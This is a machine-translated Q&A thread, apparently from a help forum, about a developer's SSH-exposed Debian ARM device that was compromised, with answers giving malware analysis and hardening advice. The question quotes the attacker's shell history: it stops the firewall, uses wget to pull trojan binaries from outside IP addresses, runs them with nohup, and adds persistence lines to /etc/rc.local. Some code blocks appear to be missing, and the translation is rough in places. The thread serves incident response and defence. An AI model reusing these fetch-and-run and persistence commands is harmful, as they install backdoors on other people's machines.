Я разрабатываю потребительский продукт, и он должен быть подключен к Интернету, так что, как и ожидалось, он подключен к Интернету, чтобы я мог правильно его разработать.
Я ушел на час или два, и когда я вернулся в свой офис, я заметил некоторые странные команды, написанные в терминале.
Глядя на файл журнала Linux под названием, auth.log
я вижу следующие строки (среди многих других):
Feb 1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162 user=root
Feb 1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Feb 1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]
40.127.205.162
Оказывается, IP-адрес принадлежит Microsoft .
Вот несколько команд, которые использовались, пока меня не было:
355 service iptables stop
356 cd /tmp
357 wget http://222.186.30.209:65534/yjz1
358 chmod 0755 /tmp/yjz1
359 nohup /tmp/yjz1 > /dev/null 2>&1 &
360 chmod 777 yjz1
361 ./yjz1
362 chmod 0755 /tmp/yjz1
363 nohup /tmp/yjz1 > /dev/null 2>&1 &
364 chmod 0777 yjz1
365 chmod u+x yjz1
366 ./yjz1 &
367 chmod u+x yjz1
368 ./yjz1 &
369 wget http://222.186.30.209:65534/yjz
370 chmod 0755 /tmp/yjz
371 nohup /tmp/yjz > /dev/null 2>&1 &
372 chmod 777 yjz
373 ./yjz
374 chmod 0755 /tmp/yjz
375 nohup /tmp/yjz > /dev/null 2>&1 &
376 chmod u+x yjz
377 ./yjz &
378 chmod u+x yjz
379 ./yjz &
380 cd /tmp
381 echo "cd /tmp/">>/etc/rc.local
382 service iptables stop
383 cd /tmp
384 wget http://222.186.30.209:65534/yjz1
385 chmod 0755 /tmp/yjz1
386 nohup /tmp/yjz1 > /dev/null 2>&1 &
387 chmod 777 yjz1
388 ./yjz1
389 chmod 0755 /tmp/yjz1
390 nohup /tmp/yjz1 > /dev/null 2>&1 &
391 chmod u+x yjz1
392 ./yjz1 &
393 chmod 0777 yjz1
394 ./yjz1 &
395 echo "cd /tmp/">>/etc/rc.local
396 service iptables stop
397 wget http://222.186.30.209:65534/yjz1
398 chmod 0755 /root/yjz1
399 nohup /root/yjz1 > /dev/null 2>&1 &
400 chmod 777 yjz1
401 ./yjz1
402 chmod 0755 /root/yjz1
403 nohup /root/yjz1 > /dev/null 2>&1 &
404 chmod u+x yjz1
405 ./yjz1 &
406 chmod 0777 yjz1
407 ./yjz1 &
408 echo "cd /root/">>/etc/rc.local
409 cd /tmp
410 service iptables stop
411 wget http://222.186.30.209:65534/yjz1
412 chmod 0755 /tmp/yjz1
413 nohup /tmp/yjz1 > /dev/null 2>&1 &
414 chmod 777 yjz1
415 ./yjz1 &
416 cd /etc
417 echo "cd /root/">>/etc/rc.local
418 echo "./yjz1&">>/etc/rc.local
419 echo "./yjz1&">>/etc/rc.local
420 echo "/etc/init.d/iptables stop">>/etc/rc.local
421 cd /tmp
422 service iptables stop
423 wget http://222.186.30.209:65534/yjz1
424 chmod 0755 /tmp/yjz1
425 nohup /tmp/yjz1 > /dev/null 2>&1 &
426 chmod 777 yjz1
427 ./yjz1 &
428 cd /etc
429 echo "cd /root/">>/etc/rc.local
430 echo "./yjz1&">>/etc/rc.local
431 echo "./yjz1&">>/etc/rc.local
432 echo "/etc/init.d/iptables stop">>/etc/rc.local
433 cd /tmp
434 service iptables stop
435 wget http://222.186.30.209:65534/yjz1
436 chmod 0755 /tmp/yjz1
437 nohup /tmp/yjz1 > /dev/null 2>&1 &
438 chmod 777 yjz1
439 ./yjz1 &
440 cd /etc
441 echo "cd /root/">>/etc/rc.local
442 echo "./yjz1&">>/etc/rc.local
443 echo "./yjz1&">>/etc/rc.local
444 echo "/etc/init.d/iptables stop">>/etc/rc.local
445 service iptables stop
446 wget http://222.186.30.209:65534/yjz1
447 chmod 0755 /root/yjz1
448 nohup /root/yjz1 > /dev/null 2>&1 &
449 chmod 777 yjz1
450 ./yjz1
451 chmod 0755 /root/yjz1
452 nohup /root/yjz1 > /dev/null 2>&1 &
453 chmod 0777 yjz1
454 chmod u+x yjz1
455 ./yjz1 &
456 chmod u+x yjz1
457 ./yjz1 &
И более:
481 service iptables stop
482 wget http://222.186.30.209:65534/yjz1
483 chmod 0755 /root/yjz1
484 nohup /root/yjz1 > /dev/null 2>&1 &
485 chmod 777 yjz1
486 ./yjz1
487 chmod 0755 /root/yjz1
488 nohup /root/yjz1 > /dev/null 2>&1 &
489 chmod 0777 yjz1
490 chmod u+x yjz1
491 ./yjz1 &
492 chmod u+x yjz1
493 ./yjz1 &
494 cd /tmp
495 service iptables stop
496 wget http://175.102.133.55:2/yjz
497 ./yd_cd/make
498 service iptables stop
499 service iptables stop
500 wget http://222.186.30.209:65534/yjz1
Я был совершенно не в курсе этого. Как правильно защитить свой продукт?
Я хотел бы опубликовать полный auth.log
файл. Как мне это сделать?
Кроме того yjz1
, загруженный файл , по-видимому, является трояном Linux, и все это, похоже, выполняется какой-то хакерской группой в соответствии с http://anti-hacker-alliance.com/index.php?ip=40.127.205.162.
Должен ли я позвонить в Microsoft и поговорить с ними? Что я должен делать?
источник
Ответы:
РЕДАКТИРОВАТЬ 2 :
Есть одна веская причина, по которой этот пост привлекает такое большое внимание: вам удалось записать на своем компьютере целую живую сессию злоумышленника. Это очень отличается от нашего повседневного опыта, когда мы имеем дело с обнаружением последствий его действий и пытаемся исправить их. Здесь мы видим его на работе, видим, что у него есть некоторые проблемы с установкой черного хода, проследить его шаги, лихорадочно работать (возможно, потому что он сидел за вашим столом, как предложено выше, или, возможно, и, на мой взгляд, более вероятно, потому что он был не в состоянии заставить свою вредоносную программу работать в системе, прочитайте ниже), и попытайтесь развернуть полностью автономные инструменты контроля. Это то, что исследователи безопасности ежедневно наблюдают со своими ловушками . Для меня это очень редкий шанс и источник некоторых развлечений.
Вы определенно были взломаны. Доказательства это не происходят из фрагмента из
auth.log
файла, отображаемого, поскольку это сообщает неудачную попытку входа, происходит в течение короткого промежутка времени (два ИКС). Вы заметите, что вторая строка сообщаетFailed password
, а третья сообщает обpre-auth
отключении: парень попытался и потерпел неудачу.Доказательства приходят вместо от содержания двух файлов
http://222.186.30.209:65534/yjz
иhttp://222.186.30.209:65534/yjz1
которые злоумышленник загруженных на вашу систему.Сайт в настоящее время открыт для всех желающих их скачать, что я и сделал. Я сначала побежал
file
на них, которые показали:Затем я перенес их на имеющуюся у меня 64-битную виртуальную машину Debian; проверка их содержимого с помощью
strings
команды показала много подозрительного (ссылки на различные известные атаки, команды, которые должны быть заменены, скрипт, который явно использовался для настройки новой службы и т. д.).Затем я создал MD5-хэши обоих файлов и передал их в хеш-базу данных Cymru, чтобы узнать, являются ли они известными агентами вредоносного ПО. Пока
yjz
нет,yjz1
есть, и Cymru сообщает о вероятности обнаружения антивирусным программным обеспечением 58%. В нем также говорится, что этот файл в последний раз видели около трех дней назад, так что это достаточно недавно.Запуск clamscan (часть
clamav
пакета) для двух полученных мной файлов:так что теперь мы уверены, что стандартное программное обеспечение Linux может идентифицировать его.
Что вы должны сделать?
Хотя и довольно новая, ни одна из систем не очень новая, см. , Например , эту статью за январь 2015 года о XorDdos . Поэтому большинство бесплатных пакетов должно быть в состоянии удалить его. Вы должны попробовать:
clamav
,rkhunter
,chkrootkit
. Я погуглил вокруг и увидел, что они утверждают, что могут его заметить. Используйте их для проверки работы предшественника, но после запуска этих трех программ вы должны быть готовы к работе.Что касается более крупного вопроса
what should you do to prevent future infections
, ответ Journeyman - хороший первый шаг. Просто помните, что это постоянная борьба, которую все мы (включая меня!) Вполне могли проиграть, даже не зная об этом.РЕДАКТИРОВАТЬ :
По косвенной подсказке Виктора Тота я хотел бы добавить несколько комментариев. Конечно, злоумышленник столкнулся с некоторыми трудностями: он загружает два разных хакерских инструмента, несколько раз меняет их разрешения, несколько раз перезапускает и много раз пытается отключить брандмауэр. Легко догадаться, что происходит: он ожидает, что его хакерские инструменты откроют канал связи с одним из его зараженных ПК (см. Позже), и, когда он не видит, что этот новый канал появляется на его контрольном интерфейсе, боится его взлома. Инструмент блокируется брандмауэром, поэтому он повторяет процедуру установки. Я согласен с Виктором Тотом, что этот конкретный этап его операции, похоже, не приносит ожидаемых результатов, но я хотел бы вас очень воодушевить не стоит недооценивать степень ущерба, нанесенного вашему компьютеру.
Я приведу здесь частичный вывод
strings yjz1
:Это свидетельствует о вмешательстве в службы (в
/etc/init.d
и в/etc/rc.d
)crontab
, в файл историиmysql
и в пару файлов, наproc
которые есть ссылкиbash
(что указывает на то, что была установлена специальная мошенническая версия вашей оболочки). Затем программа генерирует HTTP-запрос (на китайскоязычный сайт,что дает основание для комментария Дэвида Шварца выше), что может создать еще больший хаос. В запросе исполняемые файлы (
Content-Type: application/x-www-form-urlencoded
) должны быть загружены на атакованный компьютер (GET) и загружены на управляющий компьютер (POST). Я не мог определить , что будет загружен на атакуемого компьютера, но, учитывая небольшой размер какyjz
иyjz1
(1.1MB и 600KB, repectively), я могу рискну предположить , что большинство файлов , необходимых для прикрытия руткита, то есть измененный версииls
,netstat
,ps
,ifconfig
, ..., будет загружен этот путь. И это объясняет лихорадочные попытки злоумышленника запустить эту загрузку.Нет уверенности в том, что вышесказанное исчерпывает все возможности: нам, безусловно, не хватает части стенограммы (между строками 457 и 481), и мы не видим выхода из системы; кроме того, особенно тревожат линии 495-497,
которые ссылаются на файл, который мы не видели загруженным, и который может быть компиляцией: если это так, это означает, что злоумышленник (наконец-то?) понял, в чем заключалась проблема с его исполняемыми файлами, и пытается ее исправить, и в этом случае атакованный компьютер ушел навсегда. [На самом деле две версии вредоносного ПО, загруженного злоумышленником на взломанную машину (а я на мою 64-битную виртуальную машину Debian), предназначены для неподходящей архитектуры, x86, в то время как одно только имя взломанного компьютера выдает тот факт, что он имел дело с архитектурой руки].
Причина, по которой я написал эту редакцию, состоит в том, чтобы как можно сильнее убедить вас либо расчистить вашу систему профессиональным инструментом, либо переустановить ее с нуля.
И, кстати, если это окажется полезным для всех, это список из 331 IP-адресов, к которым
yjz
пытается подключиться. Этот список настолько велик (и, вероятно, ему суждено стать еще больше), что я считаю, что это причина подделкиmysql
. Список, предоставленный другим бэкдором, идентичен, что, как я полагаю, является причиной того, что такая важная часть информации остается открытой (я думаю, что злоумышленник не хотел прилагать усилия для сохранения их в формате ядра, поэтому он поместил весь список в открытый текстовый файл, который, вероятно, был прочитан всеми его бэкдорами для любой ОС):Следующий код
Из приведенного выше списка видно, что 302 из 331 адресов находятся в материковом Китае, остальные - в Гонконге, Монголии, Тайване. Это добавляет дополнительную поддержку утверждению Дэвида Шварца, что это в основном китайский бот-ринг.
РЕДАКТИРОВАТЬ 3
По запросу @ vaid (автор ОП, прочитайте его комментарий ниже) я добавлю комментарий о том, как усилить безопасность базовой системы Linux (для системы, предоставляющей много сервисов, это гораздо более сложная тема).
vaid
утверждает, что он сделал следующее:Это нормально (за исключением того, что я использую порт выше 10000, так как многие полезные программы используют порты ниже 10000). Но я не могу особо подчеркнуть необходимость использования криптографических ключей для входа по ssh вместо паролей. Я приведу вам личный пример. На одном из моих VPS я не был уверен, стоит ли менять порт ssh; Я оставил его на 22, но использовал криптографические ключи для аутентификации. У меня были сотни попыток взлома в день , но ни одна из них не удалась. Когда, устав от ежедневной проверки того, что ни у кого ничего не получилось, я в итоге переключил порт на что-то более 10000, попытки взлома обнулились. Имейте в виду, дело не в том, что хакеры глупы (они не таковы!), Они просто выслеживают более легкую добычу.
Ключ шифрования легко активировать с помощью RSA в качестве алгоритма подписи, см. Комментарий Яна Худека ниже (спасибо!):
Теперь все, что вам нужно сделать, это скопировать файл
id_rsa
на компьютер, к которому вы хотите подключиться (в каталоге.ssh
, также сchmod
именем 700), затем выполнить командуЕсли вы уверены, что это работает, отредактируйте на сервере (= машине, к которой вы хотите подключиться) файл
/etc/ssh/sshd_config
и измените строкув
и перезапустите
ssh
сервис (service ssh restart
илиsystemctl restart ssh
, или что-то в этом роде, в зависимости от дистрибутива).Это выдержит многое. На самом деле, в настоящее время нет известных эксплойтов против текущих версий
openssh v2
RSA и их использованияopenssh v2
.Наконец, для того, чтобы по-настоящему сбить с толку вашу машину, вам необходимо настроить брандмауэр (netfilter / iptables) следующим образом:
Это: 1) разрешает ssh-соединения как из локальной сети, так и из глобальной сети, 2) разрешает весь ввод, созданный вашими запросами (например, при загрузке веб-страницы), 3) отбрасывает все остальное на входе, 4) разрешает все, что включено вывод, и 5-6) позволяет все на петлевой интерфейс.
По мере роста ваших потребностей и необходимости открывать больше портов, вы можете сделать это, добавив вверху списка такие правила:
например, чтобы люди могли получить доступ к вашему веб-браузеру.
источник
yjz1
через Googles VirusTotal.com, который дал положительный результат. Я даже не видел, чтоyjz
было загружено. Благодарю.strings
с ненадежными данными. lcamtuf.blogspot.com/2014/10/…ls
,who
или что - нибудь еще. «Спасение данных» с использованием любого исполняемого файла в скомпрометированной системе (например,scp
илиrsync
) может поставить под угрозу еще больше машин.Добро пожаловать в Интернет - где любой открытый SSH-сервер, вероятно, будет подвергнут зондированию, грубому принуждению и получению различных унижений.
Для начала необходимо полностью стереть хранилище на продукте. Представьте его, если вы хотите передать его для экспертизы, но установка Linux на нем теперь подозрительна.
Немного догадок, но
Вы получили перебор или используете общий пароль. Это безопасность по неясности, но вам не нужен пароль словаря или использование учетной записи root, открытой для SSH. Отключите корневой доступ по SSH, если это опция, или хотя бы измените имя, поэтому им нужно угадать оба. В любом случае, SSHing как root - ужасная практика безопасности. Если вам необходимо использовать root, войдите в систему как другой пользователь и используйте su или sudo для переключения.
В зависимости от продукта может потребоваться каким-либо образом заблокировать доступ по SSH. Полная блокировка звучит как хорошая идея и позволяет пользователям открывать ее по мере необходимости . В зависимости от того, какие ресурсы вы можете сэкономить, рассмотрите возможность использования только IP-адресов в вашей собственной подсети или какой-либо системе регулирования входа в систему. Если вам не нужен конечный продукт, убедитесь, что он выключен.
Используйте нестандартный порт. Опять безопасность от неясности, но это означает, что злоумышленник должен нацелиться на ваш порт.
Никогда не используйте пароль по умолчанию. Лучший подход, который я видел, - это случайное генерирование пароля для конкретного устройства и его поставка вместе с вашим продуктом. Лучшая практика - аутентификация на основе ключей, но я не знаю, как вы подходите к этому на массовом рынке.
источник
О, ты определенно был взломан. Похоже, кто-то смог получить учетные данные root и попытался загрузить троянец в вашу систему. MariusMatutiae предоставил анализ полезной нагрузки.
Возникают два вопроса: а) Был ли злоумышленник успешным? И б) что вы можете с этим поделать?
Ответ на первый вопрос может быть нет. Обратите внимание, как злоумышленник постоянно пытается загрузить и запустить полезную нагрузку, по-видимому, безуспешно. Я подозреваю, что что-то (SELinux, случайно?) Стояло у него на пути.
ОДНАКО: злоумышленник также изменил ваш
/etc/rc.d/rc.local
файл, в надежде, что при перезапуске вашей системы, полезная нагрузка будет активирована. Если вы еще не перезапустили систему, не перезапускайте ее, пока не удалите эти изменения из/etc/rc.d/rc.local
. Если вы уже перезапустили его ... ну, не повезло.Что вы можете с этим поделать: Самое безопасное, что нужно сделать, это стереть систему и переустановить ее с нуля. Но это не всегда может быть вариантом. Гораздо менее безопасная вещь - это проанализировать, что именно произошло, и стереть все следы, если можете. Опять же, если вы еще не перезапустили систему, возможно, все, что нужно, это очистить
/etc/rc.d/rc.local
, удалить все, что было загружено злоумышленником, и, что не менее важно , изменить чертов пароль!Однако, если злоумышленник уже смог запустить полезную нагрузку, в вашей системе могут быть другие модификации, которые могут быть трудно обнаружить. Вот почему полная очистка - действительно единственный безопасный (и рекомендуемый) вариант. Как вы указали, рассматриваемое оборудование может быть целью тестирования / разработки, поэтому, возможно, его стирание не так болезненно, как в других случаях.
Обновление : несмотря на то, что я написал о возможном восстановлении, я хотел бы повторить очень сильную рекомендацию MariusMatutiae не недооценивать потенциальный ущерб, причиненный этой полезной нагрузкой, и степень, в которой она могла бы скомпрометировать целевую систему.
источник
Мой sshd-honeypot также видел этот вид атаки. Первые загрузки с этого URL начались 2016-01-29 10:25:33 и атаки все еще продолжаются. Атаки идут
Вход от этих злоумышленников был:
Так что никаких действий, кроме установки бэкдора на потом.
источник
Все здесь предлагают твердые советы, но, для ясности, ваши приоритеты должны быть в резервном копировании и проверке того, что вам действительно нужно из этой системы, а затем в новой установке с известных безопасных носителей.
Прежде чем подключить недавно установленный хост к Интернету, ознакомьтесь с этими идеями:
Создайте нового пользователя без полномочий root и войдите в систему как этот пользователь. Вы никогда не должны входить в систему как root, просто sudo (замещающий пользователь), когда это необходимо.
Установите SE Linux, параметры конфигурации, которые включают обязательный контроль доступа: https://wiki.debian.org/SELinux/Setup
Рассмотрим аппаратный брандмауэр между вашим офисом / домом и Интернетом. Я использую MicroTik, который имеет отличную поддержку сообщества: http://routerboard.com/ .
Предполагая, что у вас есть сроки для завершения вашей оплачиваемой работы, по крайней мере, сделать # 1. № 3 быстро и дешево, но вам нужно будет либо подождать посылку по почте, либо доехать до магазина.
источник
Является ли debian-armhf вашим именем хоста? Или вы используете установку по умолчанию с настройками по умолчанию? В этом нет никаких проблем, но вы не должны позволять хосту быть напрямую подключенным к Интернету (т.е., по крайней мере, не защищенным вашим модемом).
Похоже , что реальная проблема исходит от 222.186.30.209 (см http://anti-hacker-alliance.com/index.php?ip=222.186.30.209 ). Вы не должны обращать особого внимания на просмотр IP-адреса Microsoft. IP-адреса могут быть более или менее легко подделаны / подделаны.
Обычным способом подключения к Интернету является пересылка известного списка портов с вашего общедоступного IP-адреса (например, 8.8.8.8) на ваш локальный (например, 192.168.1.12).
Например, не перенаправляйте все входящие соединения с 8.8.8.8 (общедоступные) на 192.168.1.12 (локальные).
Переадресация только на порты 22 и 25 (ssh и входящая почта соответственно). Разумеется, у вас должны быть обновленные ssh и smtp пакеты / библиотеки.
Что дальше? Отключите хост, и изменить пароли (на любых компьютерах , связанных с организацией), которые жестко прописаны в сценарии оболочки (позор вам!) В
/etc/shadow
.источник
Как говорили другие, совершенно очевидно, что безопасность вашего сервера была нарушена. Самое безопасное - это стереть эту машину и переустановить.
Чтобы ответить на вторую часть вашего вопроса, если вы не можете использовать аутентификацию с открытым ключом, я рекомендую хотя бы настроить Fail2Ban и запустить SSH на нестандартном порту. Я также отключаю корневой доступ по SSH.
Fail2Ban поможет смягчить атаки методом перебора, запретив IP-адреса, которые не могут войти в систему определенное количество раз.
Настройка прослушивания sshd на нестандартный порт, по крайней мере, поможет немного уменьшить видимость вашего SSH-сервера. Отключение входа в систему root также немного уменьшает профиль атаки. В
/etc/sshd_config
:Когда root-вход отключен, вам нужно будет либо переключиться на root
su
после подключения, либо (более предпочтительно) использоватьsudo
для выполнения привилегированных команд.источник
SSH серверы постоянно подвергаются атакам в интернете. Пара вещей, которые вы делаете:
Убедитесь, что вы используете очень безопасный случайный пароль для компьютеров, доступных через Интернет. Я имею в виду, как 16 или более символов и совершенно случайно. Используйте менеджер паролей, чтобы вам не пришлось его запоминать. Если вы можете запомнить свой пароль, это слишком просто.
Если вам не нужен SSH, выключите его. Если вам это нужно, но не нужно, чтобы он был общедоступным, запустите его с большим нестандартным номером порта. Это значительно сократит количество попыток взлома. Да, выделенный хакер может выполнить сканирование портов, но автоматизированные боты не найдут его.
Фрагмент из вашего журнала авторизации показывает неудачную попытку. Однако, если вы посмотрите дальше, вы, несомненно, увидите успешный вход в систему. Если вы используете простой пароль, то для бота это тривиально.
Вам нужно изолировать эту машину от сети. Очень осторожно достаньте то, что вам нужно, а затем вытрите.
источник
Первое, что должен сделать каждый / каждый после настройки фронтального сервера Linux / Unix, - это немедленно отключить его
root
.Ваша система была взломана. У вас есть журнал истории выполнения, который может быть интересным для просмотра. Но, честно говоря, разбираться в деталях немного придирчиво, и это не поможет вам защитить ваш сервер. Он показывает всякую чепуху, которая возникает, когда ботнет порождает вредоносное ПО, которое, скорее всего, заразило ваш сервер, заражает систему Linux. Ответ предоставляется @MariusMatutiae красиво и хорошо продуман и есть другие , которые повторяют , что вы были взломаны с помощью
root
доступа, мокрая мечта вредоносного / ботнета.Есть несколько объяснений о том, как отключить,
root
но я констатирую из личного опыта, большинство всего, что выходит за рамки того, что я сейчас опишу, является излишним. Вот что вы должны были сделать при первой настройке сервера:sudo
правами: создайте нового пользователя с новым именем - что-то вродеcooldude
этого - используя команду, например,sudo adduser cooldude
если вы используете Ubuntu или систему Debian другого типа. Затем просто вручную отредактируйтеsudo
файл, используя команду, подобную этой,sudo nano /etc/sudoers
и добавьте строку, подобнуюcooldude ALL=(ALL:ALL) ALL
эквивалентной строке, которая должна читатьсяroot ALL=(ALL:ALL) ALL
. После этого войдите в систему какcooldude
и протестируйтеsudo
команду с помощью команды, такой какsudo w
что-то простое и неразрушающее, чтобы увидеть,sudo
работают ли права. Вам может быть предложено ввести пароль. Это работает? Все хорошо! Перейдите к следующему шагу.root
учетной записи: Хорошо, теперь, когда у васcooldude
естьsudo
права, войдите в системуcooldude
и выполните эту команду, чтобы заблокировать учетную запись rootsudo passwd -l root
. Если вы как-то создали пару ключей SSHroot
, откройте/root/.ssh/authorized_keys
и удалите ключи. Или, что еще лучше, просто переименуйте этот файлauthorized_keys_OFF
следующим образом,sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFF
чтобы эффективно отключить ключи SSH. Я предпочитаю позже, потому что по случайному случаю вам все еще нужен пароль без логина, вы можете просто переместить этот файл обратно к исходному имени, и вы должны быть готовы.FWIW, я управлял десятками серверов Linux на протяжении многих лет (десятилетий?) И знаю из опыта, что простое отключение
root
- и установка нового пользователя сsudo
правами - это самый простой и самый простой способ защитить любую систему Linux. Мне никогда не приходилось сталкиваться с какими-либо компромиссами через SSH, как толькоroot
отключили. И да, вы можете увидеть попытки войти через,auth.log
но они бессмысленны; Еслиroot
отключено, то эти попытки никогда ничего не дадут. Просто сидеть сложа руки и смотреть, как попытки бесконечно проваливаются!источник